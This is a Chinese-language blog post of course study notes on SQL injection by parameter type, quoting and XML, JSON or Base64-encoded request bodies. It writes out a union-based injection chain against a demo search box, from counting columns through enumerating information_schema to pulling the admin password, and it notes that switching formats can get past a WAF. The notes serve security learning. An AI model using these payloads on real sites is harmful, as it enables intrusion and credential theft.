<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 7.3.0">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon.ico">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon.ico">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/all.min.css">
  <link rel="stylesheet" href="/lib/pace/pace-theme-minimal.min.css">
  <script src="/lib/pace/pace.min.js"></script>

<script id="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"zhigao.xyz","root":"/","scheme":"Gemini","version":"7.8.0","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12,"onmobile":false},"copycode":{"enable":false,"show_result":false,"style":null},"back2top":{"enable":true,"sidebar":false,"scrollpercent":true},"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":"livere","storage":true,"lazyload":false,"nav":null,"activeClass":"livere"},"algolia":{"hits":{"per_page":10},"labels":{"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}},"localsearch":{"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},"path":"search.xml"};
  </script>

  <meta property="og:type" content="article">
<meta property="og:title" content="第54天-SQL注入&amp;数据类型&amp;参数格式&amp;JSON&amp;XML&amp;编码加密&amp;符号闭合&amp;复盘报告">
<meta property="og:url" content="http://zhigao.xyz/2026/07/28/%E7%AC%AC54%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B-%E5%8F%82%E6%95%B0%E6%A0%BC%E5%BC%8F-JSON-XML-%E7%BC%96%E7%A0%81%E5%8A%A0%E5%AF%86-%E7%AC%A6%E5%8F%B7%E9%97%AD%E5%90%88-%E5%A4%8D%E7%9B%98%E6%8A%A5%E5%91%8A/index.html">
<meta property="og:site_name" content="Voyage Memo">
<meta property="og:locale" content="zh_CN">
<meta property="article:published_time" content="2026-07-28T14:14:39.000Z">
<meta property="article:modified_time" content="2026-07-28T14:30:18.757Z">
<meta property="article:author" content="智高">
<meta property="article:tag" content="笔记">
<meta name="twitter:card" content="summary">

<link rel="canonical" href="http://zhigao.xyz/2026/07/28/%E7%AC%AC54%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B-%E5%8F%82%E6%95%B0%E6%A0%BC%E5%BC%8F-JSON-XML-%E7%BC%96%E7%A0%81%E5%8A%A0%E5%AF%86-%E7%AC%A6%E5%8F%B7%E9%97%AD%E5%90%88-%E5%A4%8D%E7%9B%98%E6%8A%A5%E5%91%8A/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>第54天-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合&复盘报告 | Voyage Memo</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <span class="logo-line-before"><i></i></span>
      <h1 class="site-title">Voyage Memo</h1>
      <span class="logo-line-after"><i></i></span>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
        <i class="fa fa-search fa-fw fa-lg"></i>
    </div>
  </div>
</div>




<nav class="site-nav">
  <ul id="menu" class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-archive fa-fw"></i>归档</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>
</nav>



  <div class="search-pop-overlay">
    <div class="popup search-popup">
        <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocapitalize="off"
           placeholder="搜索..." spellcheck="false"
           type="search" class="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result">
  <div id="no-result">
    <i class="fa fa-spinner fa-pulse fa-5x fa-fw"></i>
  </div>
</div>

    </div>
  </div>

</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content post posts-expand">
            

    
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="http://zhigao.xyz/2026/07/28/%E7%AC%AC54%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E6%95%B0%E6%8D%AE%E7%B1%BB%E5%9E%8B-%E5%8F%82%E6%95%B0%E6%A0%BC%E5%BC%8F-JSON-XML-%E7%BC%96%E7%A0%81%E5%8A%A0%E5%AF%86-%E7%AC%A6%E5%8F%B7%E9%97%AD%E5%90%88-%E5%A4%8D%E7%9B%98%E6%8A%A5%E5%91%8A/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/photo.jpg">
      <meta itemprop="name" content="智高">
      <meta itemprop="description" content="正因为我有能力跨越，这个考验才会降临!">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Voyage Memo">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          第54天-SQL注入&数据类型&参数格式&JSON&XML&编码加密&符号闭合&复盘报告
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-calendar"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2026-07-28 22:14:39 / 修改时间：22:30:18" itemprop="dateCreated datePublished" datetime="2026-07-28T22:14:39+08:00">2026-07-28</time>
            </span>
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="far fa-folder"></i>
              </span>
              <span class="post-meta-item-text">分类于</span>
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E5%B0%8F%E8%BF%AA%E5%AE%89%E5%85%A8%E8%AF%BE%E7%A8%8B%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0-web%E6%94%BB%E9%98%B2/" itemprop="url" rel="index"><span itemprop="name">小迪安全课程学习笔记(web攻防)</span></a>
                </span>
            </span>

          
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><font></font></p>
<span id="more"></span>


<p><font style="color:#ff0000;background-color:#ffff00;">演示案例：</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢</font><font style="color:#ff0000;background-color:#ffffff;"> </font><font style="color:#ff0000;background-color:#ffffff;">WEB攻防-SQL注入-参数类型&amp;符号干扰</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;">➢ WEB攻防-SQL注入-参数格式&amp;参数编码</font></p>
<p><font style="color:#ff0000;background-color:#ffffff;"></font></p>
<p><font style="color:#ff0000;background-color:#ffffff;"></font></p>
<p><font style="color:#000000;">案例说明：</font></p>
<p><font style="color:#000000;">在应用中，存在参数值为数字，字符时，符号的介入，另外搜索功能通配符的再次介入，另外传输数据可由最基本的对应赋值传递改为更加智能的XML或JSON格式传递，部分保证更安全的情况还会采用编码或加密形式传递数据，给于安全测试过程中更大的挑战和难度。</font></p>
<p><font style="color:#000000;"></font></p>
<p><font style="color:#708090;">#数字，字符，搜索</font></p>
<p><font style="color:#000000;">例：</font></p>
<p><font style="color:#0077aa;">select </font><font style="color:#9a6e3a;">* </font><font style="color:#0077aa;">from</font><font style="color:#000000;"> news </font><font style="color:#0077aa;">where</font><font style="color:#000000;"> id</font><font style="color:#9a6e3a;">&#x3D;</font><font style="color:#000000;">$id</font><font style="color:#999999;">;</font></p>
<p><font style="color:#0077aa;">select </font><font style="color:#9a6e3a;">* </font><font style="color:#0077aa;">from</font><font style="color:#000000;"> news </font><font style="color:#0077aa;">where</font><font style="color:#000000;"> name</font><font style="color:#9a6e3a;">&#x3D;</font><font style="color:#669900;">‘$name’</font><font style="color:#999999;">;</font></p>
<p><font style="color:#0077aa;">select </font><font style="color:#9a6e3a;">* </font><font style="color:#0077aa;">from</font><font style="color:#000000;"> news </font><font style="color:#0077aa;">where</font><font style="color:#000000;"> name </font><font style="color:#9a6e3a;">like</font><font style="color:#669900;">‘%name%’</font><font style="color:#999999;">;</font></p>
<p><font style="color:#000000;">符号干扰：有无单引号或双引号及通配符等</font></p>
<details class="lake-collapse"><summary id="ud74d588a"><span class="ne-text" style="font-size: 24px">案例讲解</span></summary><p id="uc9977d95" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">这里小迪演示案例就是一个网站有一个搜索框，这个搜索框的后端sql逻辑就是select * from news where name like'%name%'; </span></p><p id="uc66d4ab2" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="u2594e1b1" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">1、select </span><span class="ne-text" style="font-size: 24px">* </span><span class="ne-text" style="font-size: 24px">from</span><span class="ne-text" style="font-size: 24px"> news </span><span class="ne-text" style="font-size: 24px">where</span><span class="ne-text" style="font-size: 24px"> name </span><span class="ne-text" style="font-size: 24px">like</span><span class="ne-text" style="font-size: 24px">'%name%'</span><span class="ne-text" style="font-size: 24px"> </span><span class="ne-text" style="font-size: 24px">order by </span><span class="ne-text" style="font-size: 24px">3 </span><span class="ne-text" style="background-color: #FBDE28; font-size: 24px">这个是判断有多少个字段，因为后面要用union联合注入，必须知道前面select的字段个数，后面select的字段数量也得一样</span></p><p id="ucd192fca" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="background-color: #FBDE28; font-size: 24px"></span></p><p id="u4bab58a7" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">2、select * from news where name like'%1%' union select 1,2,3#%';</span><span class="ne-text" style="background-color: #FBDE28; font-size: 24px">这里就是使用union联合注入，判断回显位</span></p><p id="u124749b8" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="u429271a1" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">3、知道数据库名：</span><span class="ne-text" style="background-color: #FBDE28; font-size: 24px">在回显位写</span><span class="ne-text" style="font-size: 24px">database()       数据库名：news_db</span></p><p id="ue5ba2baa" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="ud5a9c23f" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">4、获取数据库名下的表名信息：</span></p><p id="u5084ffc2" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">借助自带的information_schema.tables表（记录所有数据库名下的表名）</span></p><p id="u0e6808b1" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">select </span><span class="ne-text" style="font-size: 24px">* </span><span class="ne-text" style="font-size: 24px">from</span><span class="ne-text" style="font-size: 24px"> news </span><span class="ne-text" style="font-size: 24px">where</span><span class="ne-text" style="font-size: 24px"> name </span><span class="ne-text" style="font-size: 24px">like</span><span class="ne-text" style="font-size: 24px">'%</span><span class="ne-text" style="font-size: 24px">1</span><span class="ne-text" style="font-size: 24px">%</span><span class="ne-text" style="font-size: 24px">' union select 1,2,table_name from information_schema.tables where table_schema='</span><span class="ne-text" style="font-size: 24px">news_db</span><span class="ne-text" style="font-size: 24px">'#</span></p><p id="u97487577" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="u8d4f77be" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">5、admin下列名</span></p><p id="u96c0618e" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">借助自带的information_schema.columns表（记录所有数据库名下的表名对应的列名信息）</span></p><p id="uaec65f8f" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">select </span><span class="ne-text" style="font-size: 24px">* </span><span class="ne-text" style="font-size: 24px">from</span><span class="ne-text" style="font-size: 24px"> news </span><span class="ne-text" style="font-size: 24px">where</span><span class="ne-text" style="font-size: 24px"> name </span><span class="ne-text" style="font-size: 24px">like</span><span class="ne-text" style="font-size: 24px">'%1%'</span><span class="ne-text" style="font-size: 24px">unionselect</span><span class="ne-text" style="font-size: 24px">1</span><span class="ne-text" style="font-size: 24px">,</span><span class="ne-text" style="font-size: 24px">2</span><span class="ne-text" style="font-size: 24px">,</span><span class="ne-text" style="font-size: 24px">column_name </span><span class="ne-text" style="font-size: 24px">from</span><span class="ne-text" style="font-size: 24px"> information_schema</span><span class="ne-text" style="font-size: 24px">.</span><span class="ne-text" style="font-size: 24px">columns where</span><span class="ne-text" style="font-size: 24px"> table_schema</span><span class="ne-text" style="font-size: 24px">=</span><span class="ne-text" style="font-size: 24px">'news_db' </span><span class="ne-text" style="font-size: 24px">and</span><span class="ne-text" style="font-size: 24px"> table_name</span><span class="ne-text" style="font-size: 24px">=</span><span class="ne-text" style="font-size: 24px">'admin'</span><span class="ne-text" style="font-size: 24px">#</span></p><p id="uec0e2d6c" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="u5869ad20" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">6、查admin的密码：select * from news where name like'%1%' union select 1,2,password from admin#</span></p><p id="udd4f5ac5" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px"></span></p><p id="u6168a55e" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">案例数据库架构：</span></p><p id="ub94fa7f5" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">news_db</span></p><p id="u403ff031" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">	admin</span></p><p id="uebeb2b38" class="ne-p" style="text-align: justify; line-height: 1.5"><span class="ne-text" style="font-size: 24px">		username,password</span></p></details>
<font style="color:#000000;"></font>

<p><font style="background-color:#ED740C;">#XML，JSON，编码，混合</font></p>
<p><font style="background-color:#FBDE28;">这种格式都是在post请求包的请求体中，案例和上面一样，就是我们注入攻击语句写在键值的位置</font></p>
<p><font style="background-color:#FBDE28;"></font></p>
<p>XML:</p>
<?xml version="1.0" encoding="UTF-8"?>

<news>

<article>

<p><id>1</id></p>
<title>xiaodi</title>

<p><content>i am xiaodi</content></p>
<p><created_at>2025-03-07</created_at></p>
</article>

<article>

<p><id>2</id></p>
<title>xiaodisec</title>

<p><content>i am xiaodisec</content></p>
<p><created_at>2025-03-06</created_at></p>
</article>

</news>



<p>JSON:</p>
<p>{</p>
<p>“news:”[</p>
<p>{</p>
<p>“id”: 1,</p>
<p>“title”: “xiaodi”,</p>
<p>“content”: “i am xiaodi”,</p>
<p>“created_at”: “2025-03-07”</p>
<p>},</p>
<p>{</p>
<p>“id”: 2,</p>
<p>“title”: “xiaodisec”,</p>
<p>“content”: “i am xiaodisec”,</p>
<p>“created_at”: “2025-03-06”</p>
<p>}</p>
<p>]</p>
<p>}</p>
<p><font style="background-color:#FBDE28;">数据加密&#x2F;编码的情况下，我们的payload也必须加密，要不然后端看不懂</font></p>
<p>Base64:</p>
<p>{</p>
<p>“news”: [</p>
<p>{</p>
<p>“id”: “MQ&#x3D;&#x3D;”,</p>
<p>“title”: “eGlhb2Rp”,</p>
<p>“content”: “aSBhbSB4aWFvZGk&#x3D;”,</p>
<p>“created_at”: “MjAyNS0wMy0wNw&#x3D;&#x3D;”</p>
<p>},</p>
<p>{</p>
<p>“id”: “Mg&#x3D;&#x3D;”,</p>
<p>“title”: “eGlhb2Rpc2Vj”,</p>
<p>“content”: “aSBhbSB4aWFvZGlzZWM&#x3D;”,</p>
<p>“created_at”: “MjAyNS0wMy0wNg&#x3D;&#x3D;”</p>
<p>}</p>
<p>]</p>
<p>}</p>
<p><font style="color:#000000;"></font></p>
<details class="lake-collapse"><summary id="u14f50141"><span class="ne-text" style="color: #000000; background-color: #FBDE28; font-size: 24px">我们在挖洞过程中可以改变格式来绕过：</span></summary><ul class="ne-ul"><li id="u526c4e1f" data-lake-index-type="0" style="text-align: left; line-height: 3"><span class="ne-text" style="color: rgb(0, 0, 0); background-color: rgba(0, 0, 0, 0); font-size: 24px">请求头和请求体格式必须匹配，数据包才合法。</span></li><li id="ub2345e0a" data-lake-index-type="0" style="text-align: left; line-height: 3"><span class="ne-text" style="color: rgb(0, 0, 0); background-color: rgba(0, 0, 0, 0); font-size: 24px">后端代码要有对应解析逻辑，payload 才能传入漏洞点。</span></li><li id="ub1ad1a9e" data-lake-index-type="0" style="text-align: left; line-height: 3"><span class="ne-text" style="color: rgb(0, 0, 0); background-color: rgba(0, 0, 0, 0); font-size: 24px">WAF 不能解析该格式，才可以实现绕过。</span></li></ul></details>
<font style="color:#000000;"></font>

<p><font style="color:#990055;">1</font><font style="color:#000000;">、数据传输采用XML或JSON格式传递</font></p>
<p><font style="color:#990055;">2</font><font style="color:#000000;">、数据传输采用编码或加密形式传递</font></p>
<p><font style="color:#990055;">3</font><font style="color:#000000;">、数据传递采用JSON又采用编码传递</font></p>
<p><font style="color:#000000;"></font></p>
<p><font style="background-color:#ED740C;">#实例应用：</font></p>
<p><font style="color:#990055;">1</font><font style="color:#000000;">、JSON注入案例：</font></p>
<p><font style="color:#000000;">SRC报告</font><font style="color:#9a6e3a;">-</font><font style="color:#000000;">众测下的</font><font style="color:#0077aa;">SQL</font><font style="color:#000000;">注入挖掘</font></p>
<p><font style="color:#000000;">SRC报告</font><font style="color:#9a6e3a;">-</font><font style="color:#000000;">edu</font><font style="color:#9a6e3a;">-</font><font style="color:#0077aa;">SQL</font><font style="color:#000000;">注入案例分享</font></p>
<p><font style="color:#000000;">SRC报告</font><font style="color:#9a6e3a;">-</font><font style="color:#000000;">河南省xxxx某站存在</font><font style="color:#0077aa;">SQL</font><font style="color:#000000;">注入漏洞</font></p>
<p><font style="color:#000000;background-color:#FBDE28;">这几个都是很简单的案例我就不放出来了，主要是懒得截图了</font></p>
<p><font style="color:#990055;">2</font><font style="color:#000000;">、编码注入案例：</font></p>
<p><font style="color:#000000;">互联网搜下对应说明</font></p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ"><font style="color:#708090;">https://mp.weixin.qq.com/s/Xf08xaV-YcZsQopE19pPEQ</font></a></p>

    </div>

    
    
    

      <footer class="post-footer">
          <div class="post-tags">
              <a href="/tags/%E7%AC%94%E8%AE%B0/" rel="tag"># 笔记</a>
          </div>

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2026/07/28/%E7%AC%AC53%E5%A4%A9-SQL%E6%B3%A8%E5%85%A5-%E6%95%B0%E6%8D%AE%E5%BA%93%E7%B1%BB%E5%9E%8B-%E7%94%A8%E6%88%B7%E6%9D%83%E9%99%90-%E6%9E%B6%E6%9E%84%E5%88%86%E5%B1%82-%E7%AC%A6%E5%8F%B7%E5%B9%B2%E6%89%B0-%E5%88%A9%E7%94%A8%E8%BF%87%E7%A8%8B-%E5%8F%91%E7%8E%B0%E6%80%9D%E8%B7%AF/" rel="prev" title="第53天-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路">
      <i class="fa fa-chevron-left"></i> 第53天-SQL注入&数据库类型&用户权限&架构分层&符号干扰&利用过程&发现思路
    </a></div>
      <div class="post-nav-item">
    <a href="/2026/07/28/%E8%80%81%E9%BB%91%E6%98%AFgay/" rel="next" title="buhuo">
      buhuo <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          
    
  <div class="comments">
    <div id="lv-container" data-id="city" data-uid="w0aFeK3v2HV9LRG7Ubh6"></div>
  </div>
  

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>


<livere-comment client-id="w0aFeK3v2HV9LRG7Ubh6"></livere-comment>
<script type="module" src="https://www.livere.org/livere-widget.js"></script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
    <img class="site-author-image" itemprop="image" alt="智高"
      src="/images/photo.jpg">
  <p class="site-author-name" itemprop="name">智高</p>
  <div class="site-description" itemprop="description">正因为我有能力跨越，这个考验才会降临!</div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">30</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">5</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">3</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author motion-element">
      <span class="links-of-author-item">
        <a href="https://github.com/Spider-px" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;Spider-px" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
  </div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2026</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">智高</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>



        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    <span class="post-meta-item" id="busuanzi_container_site_uv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-user"></i>
      </span>
      <span class="site-uv" title="总访客量">
        <span id="busuanzi_value_site_uv"></span>
      </span>
    </span>
    <span class="post-meta-divider">|</span>
    <span class="post-meta-item" id="busuanzi_container_site_pv" style="display: none;">
      <span class="post-meta-item-icon">
        <i class="fa fa-eye"></i>
      </span>
      <span class="site-pv" title="总访问量">
        <span id="busuanzi_value_site_pv"></span>
      </span>
    </span>
</div>








      </div>
    </footer>
  </div>

  
  <script color='0,0,0' opacity='0.7' zIndex='' count='90' src="/lib/canvas-nest/canvas-nest-nomobile.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  




  
<script src="/js/local-search.js"></script>













  

  

<script>
NexT.utils.loadComments(document.querySelector('#lv-container'), () => {
  window.livereOptions = {
    refer: location.pathname.replace(CONFIG.root, '').replace('index.html', '')
  };
  (function(d, s) {
    var j, e = d.getElementsByTagName(s)[0];
    if (typeof LivereTower === 'function') { return; }
    j = d.createElement(s);
    j.src = 'https://cdn-city.livere.com/js/embed.dist.js';
    j.async = true;
    e.parentNode.insertBefore(j, e);
  })(document, 'script');
});
</script>

</body>
</html>
